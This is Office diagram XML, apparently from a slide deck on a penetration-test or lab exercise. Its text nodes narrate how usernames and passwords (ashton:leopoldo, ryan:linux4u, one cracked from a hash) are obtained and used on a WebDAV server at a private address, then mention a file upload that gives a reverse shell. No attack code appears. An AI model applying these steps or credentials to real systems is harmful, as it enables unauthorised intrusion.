    <dgm:cxn modelId="{65114BFE-6D32-4838-A268-912ADB615E8F}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{B5764351-1465-4EC1-AA94-7161171EB54E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{61F66274-C170-4C25-822E-5D34E91DD653}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{F7EC870F-4C2F-4A94-AEBE-AC2F8607A78E}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C89082C4-1597-459D-B95F-1626E3024C34}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{5942610E-AD9E-4FD2-9023-9542A85A3CC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82B321-354C-4830-9878-88FC6BF35551}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple5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7BE98A0B-66EB-4005-986A-E57C3BA38744}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>Based on our earlier investigation, we know that Ashton, an employee of the company. We must assume ashton is the username. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAD72F11-1375-4431-9E1D-622C399287F3}" type="parTrans" cxnId="{CE9EE269-96A0-4129-9A9D-9C4F68113567}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50A9D2E9-710F-4C76-81A0-FECABE28F7DD}" type="sibTrans" cxnId="{CE9EE269-96A0-4129-9A9D-9C4F68113567}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{831539AF-7D78-4049-9382-06A54AB31F0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light"/>
            </a:rPr>
            <a:t>Using Ashton's credentials, ashton:leopoldo, we were able to successfully access the hidden directory. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19B17726-669D-4080-BC6D-ED8D24CB6CD6}" type="parTrans" cxnId="{59E77775-B7F5-4169-A042-3CA7B7A825E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14ED4C60-9C42-4B35-A586-EE89D444BBE8}" type="sibTrans" cxnId="{59E77775-B7F5-4169-A042-3CA7B7A825E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6F4A5F2-9822-437C-91F8-5BAFD7E7AC51}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light"/>
            </a:rPr>
            <a:t>Inside the hidden directory is another file labeled connect_to_corp_server, which  contains instructions to access to corporate server through Ryan's account. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7809A608-A3E8-44DC-8F91-A1D92B21EBE4}" type="parTrans" cxnId="{7B76F71E-AD08-4ECF-B562-B6C97322FDCD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A6CB857-E743-4DB2-98D7-6913129C6D39}" type="sibTrans" cxnId="{7B76F71E-AD08-4ECF-B562-B6C97322FDCD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E1986CF-FCA5-49D3-B286-227F5972DC90}" type="pres">
      <dgm:prSet presAssocID="{5C82B321-354C-4830-9878-88FC6BF35551}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CFE05B8E-A567-41BA-906C-C2BEDE7B260D}" type="pres">
      <dgm:prSet presAssocID="{7BE98A0B-66EB-4005-986A-E57C3BA3874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7027AA4-2AC4-4327-9D78-2083A80E0165}" type="pres">
      <dgm:prSet presAssocID="{50A9D2E9-710F-4C76-81A0-FECABE28F7DD}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{109B8A15-4B16-45E6-8605-948B16D246EC}" type="pres">
      <dgm:prSet presAssocID="{831539AF-7D78-4049-9382-06A54AB31F0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DF69AA7-19BA-4846-8D65-163FAFDD6D00}" type="pres">
      <dgm:prSet presAssocID="{14ED4C60-9C42-4B35-A586-EE89D444BBE8}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{385128CF-23E0-44A4-B6B5-8A036D471549}" type="pres">
      <dgm:prSet presAssocID="{D6F4A5F2-9822-437C-91F8-5BAFD7E7AC5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B76F71E-AD08-4ECF-B562-B6C97322FDCD}" srcId="{5C82B321-354C-4830-9878-88FC6BF35551}" destId="{D6F4A5F2-9822-437C-91F8-5BAFD7E7AC51}" srcOrd="2" destOrd="0" parTransId="{7809A608-A3E8-44DC-8F91-A1D92B21EBE4}" sibTransId="{1A6CB857-E743-4DB2-98D7-6913129C6D39}"/>
    <dgm:cxn modelId="{CE9EE269-96A0-4129-9A9D-9C4F68113567}" srcId="{5C82B321-354C-4830-9878-88FC6BF35551}" destId="{7BE98A0B-66EB-4005-986A-E57C3BA38744}" srcOrd="0" destOrd="0" parTransId="{EAD72F11-1375-4431-9E1D-622C399287F3}" sibTransId="{50A9D2E9-710F-4C76-81A0-FECABE28F7DD}"/>
    <dgm:cxn modelId="{0C5B6D73-C477-4A8E-B922-F18D36211749}" type="presOf" srcId="{5C82B321-354C-4830-9878-88FC6BF35551}" destId="{7E1986CF-FCA5-49D3-B286-227F5972DC90}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{59E77775-B7F5-4169-A042-3CA7B7A825E7}" srcId="{5C82B321-354C-4830-9878-88FC6BF35551}" destId="{831539AF-7D78-4049-9382-06A54AB31F0D}" srcOrd="1" destOrd="0" parTransId="{19B17726-669D-4080-BC6D-ED8D24CB6CD6}" sibTransId="{14ED4C60-9C42-4B35-A586-EE89D444BBE8}"/>
    <dgm:cxn modelId="{306872A0-CDDF-4B73-B619-4095BC0E5AB7}" type="presOf" srcId="{D6F4A5F2-9822-437C-91F8-5BAFD7E7AC51}" destId="{385128CF-23E0-44A4-B6B5-8A036D471549}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8AEE74A5-0AEC-484E-960F-B26F09E1E40C}" type="presOf" srcId="{831539AF-7D78-4049-9382-06A54AB31F0D}" destId="{109B8A15-4B16-45E6-8605-948B16D246EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5458CFF4-97A7-45F4-827E-AE361C06EDFE}" type="presOf" srcId="{7BE98A0B-66EB-4005-986A-E57C3BA38744}" destId="{CFE05B8E-A567-41BA-906C-C2BEDE7B260D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DAE9BFA9-9F97-475A-8C46-771CA470B846}" type="presParOf" srcId="{7E1986CF-FCA5-49D3-B286-227F5972DC90}" destId="{CFE05B8E-A567-41BA-906C-C2BEDE7B260D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DD01B849-3A52-4A17-AFED-2E013179078F}" type="presParOf" srcId="{7E1986CF-FCA5-49D3-B286-227F5972DC90}" destId="{F7027AA4-2AC4-4327-9D78-2083A80E0165}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3F057619-B2EC-4DBD-BD41-5DAC13FDDA70}" type="presParOf" srcId="{7E1986CF-FCA5-49D3-B286-227F5972DC90}" destId="{109B8A15-4B16-45E6-8605-948B16D246EC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{95419E43-7457-4721-B22C-F0589C7AA4FF}" type="presParOf" srcId="{7E1986CF-FCA5-49D3-B286-227F5972DC90}" destId="{9DF69AA7-19BA-4846-8D65-163FAFDD6D00}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{31932DF0-0001-4484-94B7-04C15B8D8AF6}" type="presParOf" srcId="{7E1986CF-FCA5-49D3-B286-227F5972DC90}" destId="{385128CF-23E0-44A4-B6B5-8A036D47154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0CB9611-5D3B-411A-A57B-93679CC98257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597A520-63F5-47F4-A987-A35F5F2C2C7F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>Ryan's password is protected as a hash value. Using Crack Station, we determined Ryan's password is linux4u.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CBEA777F-F5B4-4B17-AA2C-672B5C48AEBA}" type="parTrans" cxnId="{D2E357B2-AC20-4A75-AC14-D4D1C00C9893}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6D132E8-2FF3-41A4-8D52-821ED53D5A29}" type="sibTrans" cxnId="{D2E357B2-AC20-4A75-AC14-D4D1C00C9893}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B75B0DA3-A9DC-48C4-96BE-1937703B0156}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>Following the directions, we connected to the corporate server by inputting the following in the Connect to Server box in the Other Locations folder:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50B66185-0269-4A0E-A083-B4960AC232AE}" type="parTrans" cxnId="{CFBEF887-DB92-4775-A460-486D12D1A199}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47CE050A-1027-455D-B2FB-D8466C60B8A1}" type="sibTrans" cxnId="{CFBEF887-DB92-4775-A460-486D12D1A199}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CD1DA50-2717-4060-BCC1-BD1EFFC7E7F0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>dav://192.168.1.105/webdav </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{989E6CE8-65FD-4A33-B503-680ED654D7AD}" type="parTrans" cxnId="{F89E872C-9828-4338-8B90-DB07ECB82F79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73E169C6-2598-48D1-A692-6B2EB41351CC}" type="sibTrans" cxnId="{F89E872C-9828-4338-8B90-DB07ECB82F79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC224394-B7BF-4879-9735-68E16765B749}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>Using Ryan's credentials, ryan:linux4u, we successfully accessed the corporate directory. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F0B6049-2FDE-4A1E-9969-BD40CF90F066}" type="parTrans" cxnId="{131BDB8C-92B7-429F-B654-0B8E983E86E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DE654E9-777D-44E1-8326-94C2B033B90B}" type="sibTrans" cxnId="{131BDB8C-92B7-429F-B654-0B8E983E86E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64FF6F79-F59B-42BF-9499-C5E5092B2B2E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>With this access established, we know that we can upload a file directly to the corporate server's filesystem, which can be exploited to force the web application to run an unintended script.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B82DD959-3831-4652-8892-1158E9569453}" type="parTrans" cxnId="{B4676AAA-3E1B-42CD-AB33-1935894AA4D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58E28B56-8D2A-439F-B1AC-77AD89CAC7FE}" type="sibTrans" cxnId="{B4676AAA-3E1B-42CD-AB33-1935894AA4D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8096796D-2FA4-48CB-9B38-4CCF58302100}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>We exploited this vulnerability to create persistence through a reverse shell.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3BBB874-9582-4C3F-A2B0-659468719382}" type="parTrans" cxnId="{A9119265-9EC1-4E46-B0E1-45D3F315729A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DB42655-612C-45F4-905E-71BB6F2A9554}" type="sibTrans" cxnId="{A9119265-9EC1-4E46-B0E1-45D3F315729A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" type="pres">
      <dgm:prSet presAssocID="{A0CB9611-5D3B-411A-A57B-93679CC98257}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C90C4630-E365-428B-84EB-78CA73546584}" type="pres">
      <dgm:prSet presAssocID="{7597A520-63F5-47F4-A987-A35F5F2C2C7F}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D10F827-ABE2-4707-A002-601D93FA58DC}" type="pres">
      <dgm:prSet presAssocID="{7597A520-63F5-47F4-A987-A35F5F2C2C7F}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8F5F184-20E5-44DF-B99F-95404369E9FA}" type="pres">
      <dgm:prSet presAssocID="{7597A520-63F5-47F4-A987-A35F5F2C2C7F}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF8B03A3-33E4-426B-AF90-02F860D70AAB}" type="pres">
      <dgm:prSet presAssocID="{7597A520-63F5-47F4-A987-A35F5F2C2C7F}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ADC94420-F6CD-486E-BE34-9167D6217C71}" type="pres">
      <dgm:prSet presAssocID="{B75B0DA3-A9DC-48C4-96BE-1937703B0156}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F389B32-61A2-4AD3-96FC-0A1F15E9B55C}" type="pres">
      <dgm:prSet presAssocID="{B75B0DA3-A9DC-48C4-96BE-1937703B0156}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BDE55A3D-0CD0-4C04-B6D9-145AB3505FFD}" type="pres">
      <dgm:prSet presAssocID="{B75B0DA3-A9DC-48C4-96BE-1937703B0156}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19409569-B31C-4467-AA8B-1CD64A9B7FD8}" type="pres">
      <dgm:prSet presAssocID="{B75B0DA3-A9DC-48C4-96BE-1937703B0156}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A025D881-9505-4059-ACAF-A2DE774A722E}" type="pres">
      <dgm:prSet presAssocID="{0CD1DA50-2717-4060-BCC1-BD1EFFC7E7F0}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A90B99EB-D8D9-42A0-9CCB-494CC1720124}" type="pres">
      <dgm:prSet presAssocID="{0CD1DA50-2717-4060-BCC1-BD1EFFC7E7F0}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D1F8E8C-A927-4315-9E73-90428D660C69}" type="pres">
      <dgm:prSet presAssocID="{0CD1DA50-2717-4060-BCC1-BD1EFFC7E7F0}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23ADEDE8-2BEE-4071-B7DD-F583951ADEF6}" type="pres">
      <dgm:prSet presAssocID="{0CD1DA50-2717-4060-BCC1-BD1EFFC7E7F0}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BF56476-60E6-4982-AD34-D5E50FCDF9E3}" type="pres">
      <dgm:prSet presAssocID="{BC224394-B7BF-4879-9735-68E16765B749}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{592916C3-FB54-4E62-B74B-B6892BB68894}" type="pres">
      <dgm:prSet presAssocID="{BC224394-B7BF-4879-9735-68E16765B749}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E5BD107-29B5-4CF7-B252-35D37DC982B9}" type="pres">
      <dgm:prSet presAssocID="{BC224394-B7BF-4879-9735-68E16765B749}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3CD35C0B-0BFE-4C85-9D36-2DEEE0F3041D}" type="pres">
      <dgm:prSet presAssocID="{BC224394-B7BF-4879-9735-68E16765B749}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E572E846-9D11-4650-8FAD-20FE17BDE2AB}" type="pres">
      <dgm:prSet presAssocID="{64FF6F79-F59B-42BF-9499-C5E5092B2B2E}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C73E9E6E-5E76-4569-AA79-A9A3DCAEE577}" type="pres">
      <dgm:prSet presAssocID="{64FF6F79-F59B-42BF-9499-C5E5092B2B2E}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F9BA28B-3190-4F11-99F6-9673DC774612}" type="pres">
      <dgm:prSet presAssocID="{64FF6F79-F59B-42BF-9499-C5E5092B2B2E}" presName="tx1" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1FD028EB-4AA8-4222-9843-7E8DF8B9486C}" type="pres">
      <dgm:prSet presAssocID="{64FF6F79-F59B-42BF-9499-C5E5092B2B2E}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BBC5869-F625-44D2-AB73-7DB8E1D7A89D}" type="pres">
      <dgm:prSet presAssocID="{8096796D-2FA4-48CB-9B38-4CCF58302100}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0111E0D-F8B3-46A0-9444-CF67096803B7}" type="pres">
      <dgm:prSet presAssocID="{8096796D-2FA4-48CB-9B38-4CCF58302100}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FE8545E-34B7-46B9-9AA2-AEB06D8951EE}" type="pres">
      <dgm:prSet presAssocID="{8096796D-2FA4-48CB-9B38-4CCF58302100}" presName="tx1" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5BD58436-3C67-43A6-97B7-C2C3BBA19D90}" type="pres">
      <dgm:prSet presAssocID="{8096796D-2FA4-48CB-9B38-4CCF58302100}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{5B00A810-6BD2-42AE-918F-B6CB9B9D8FB6}" type="presOf" srcId="{8096796D-2FA4-48CB-9B38-4CCF58302100}" destId="{3FE8545E-34B7-46B9-9AA2-AEB06D8951EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F89E872C-9828-4338-8B90-DB07ECB82F79}" srcId="{A0CB9611-5D3B-411A-A57B-93679CC98257}" destId="{0CD1DA50-2717-4060-BCC1-BD1EFFC7E7F0}" srcOrd="2" destOrd="0" parTransId="{989E6CE8-65FD-4A33-B503-680ED654D7AD}" sibTransId="{73E169C6-2598-48D1-A692-6B2EB41351CC}"/>
    <dgm:cxn modelId="{A9119265-9EC1-4E46-B0E1-45D3F315729A}" srcId="{A0CB9611-5D3B-411A-A57B-93679CC98257}" destId="{8096796D-2FA4-48CB-9B38-4CCF58302100}" srcOrd="5" destOrd="0" parTransId="{C3BBB874-9582-4C3F-A2B0-659468719382}" sibTransId="{4DB42655-612C-45F4-905E-71BB6F2A9554}"/>
    <dgm:cxn modelId="{6CC6304E-0198-4810-99AE-8CB490C08E4B}" type="presOf" srcId="{0CD1DA50-2717-4060-BCC1-BD1EFFC7E7F0}" destId="{6D1F8E8C-A927-4315-9E73-90428D660C69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{CFBEF887-DB92-4775-A460-486D12D1A199}" srcId="{A0CB9611-5D3B-411A-A57B-93679CC98257}" destId="{B75B0DA3-A9DC-48C4-96BE-1937703B0156}" srcOrd="1" destOrd="0" parTransId="{50B66185-0269-4A0E-A083-B4960AC232AE}" sibTransId="{47CE050A-1027-455D-B2FB-D8466C60B8A1}"/>
    <dgm:cxn modelId="{131BDB8C-92B7-429F-B654-0B8E983E86E9}" srcId="{A0CB9611-5D3B-411A-A57B-93679CC98257}" destId="{BC224394-B7BF-4879-9735-68E16765B749}" srcOrd="3" destOrd="0" parTransId="{0F0B6049-2FDE-4A1E-9969-BD40CF90F066}" sibTransId="{1DE654E9-777D-44E1-8326-94C2B033B90B}"/>
    <dgm:cxn modelId="{B4676AAA-3E1B-42CD-AB33-1935894AA4D8}" srcId="{A0CB9611-5D3B-411A-A57B-93679CC98257}" destId="{64FF6F79-F59B-42BF-9499-C5E5092B2B2E}" srcOrd="4" destOrd="0" parTransId="{B82DD959-3831-4652-8892-1158E9569453}" sibTransId="{58E28B56-8D2A-439F-B1AC-77AD89CAC7FE}"/>
    <dgm:cxn modelId="{85A93FB1-6440-4EB2-AC17-E07FD7341F1A}" type="presOf" srcId="{64FF6F79-F59B-42BF-9499-C5E5092B2B2E}" destId="{4F9BA28B-3190-4F11-99F6-9673DC774612}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D2E357B2-AC20-4A75-AC14-D4D1C00C9893}" srcId="{A0CB9611-5D3B-411A-A57B-93679CC98257}" destId="{7597A520-63F5-47F4-A987-A35F5F2C2C7F}" srcOrd="0" destOrd="0" parTransId="{CBEA777F-F5B4-4B17-AA2C-672B5C48AEBA}" sibTransId="{C6D132E8-2FF3-41A4-8D52-821ED53D5A29}"/>
    <dgm:cxn modelId="{D9169BBF-0387-4656-8E11-10390E2E76B8}" type="presOf" srcId="{BC224394-B7BF-4879-9735-68E16765B749}" destId="{1E5BD107-29B5-4CF7-B252-35D37DC982B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{723D04F1-F233-4203-B658-CA3B5DF8664C}" type="presOf" srcId="{A0CB9611-5D3B-411A-A57B-93679CC98257}" destId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{335C65F1-818F-4F2E-9152-32C2C7099F68}" type="presOf" srcId="{7597A520-63F5-47F4-A987-A35F5F2C2C7F}" destId="{B8F5F184-20E5-44DF-B99F-95404369E9FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
